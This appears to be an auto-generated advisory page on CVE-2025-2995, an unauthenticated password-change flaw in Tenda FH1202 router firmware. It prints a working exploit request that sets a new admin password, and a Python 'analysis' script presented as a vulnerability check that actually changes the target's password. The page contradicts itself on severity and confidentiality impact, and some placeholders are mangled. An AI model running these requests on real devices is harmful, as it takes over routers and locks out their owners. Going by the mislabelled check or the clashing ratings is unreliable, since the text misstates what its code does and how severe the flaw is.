How CVE-2025-2995 Works
The vulnerability in Tenda FH1202 firmware version 1.2.0.14(408) resides in the `/goform/SysToolChangePwd` endpoint of the web management interface. Attackers can remotely exploit improper access controls to manipulate system passwords without authentication. The flaw allows unauthorized users to send crafted HTTP requests to modify credentials, potentially gaining full administrative access. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N) indicates network-based exploitation with low attack complexity. Publicly disclosed PoCs increase the risk of weaponization.
DailyCVE Form
Platform: Tenda FH1202
Version: 1.2.0.14(408)
Vulnerability: Improper Access Control
Severity: Critical
Date: 04/08/2025
What Undercode Say:
Exploitation
POST /goform/SysToolChangePwd HTTP/1.1 Host: [bash] Content-Type: application/x-www-form-urlencoded password=new_admin_pass&confirm=new_admin_pass
Detection
nmap -p 80,443 --script http-vuln-cve2025-2995 [bash]
Mitigation
1. Patch: Upgrade firmware beyond 1.2.0.14(408).
- Workaround: Block unauthorized access to `/goform/SysToolChangePwd` via ACL:
location /goform/SysToolChangePwd { deny all; }
Analysis Tools
import requests
target = "http://192.168.1.1"
response = requests.post(f"{target}/goform/SysToolChangePwd", data={"password": "test", "confirm": "test"})
print("Vulnerable" if response.status_code == 200 else "Patched")
Log Monitoring
grep "POST /goform/SysToolChangePwd" /var/log/nginx/access.log
CVSS 4.0 Breakdown
- Attack Vector: Network
- Impact: Confidentiality (Low), Integrity (Low)
- Exploitability: No Privileges Required
References
Firmware Download
wget https://www.tenda.com/firmware/FH1202_1.2.0.15.bin
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2995
Extra Source Hub:
Undercode
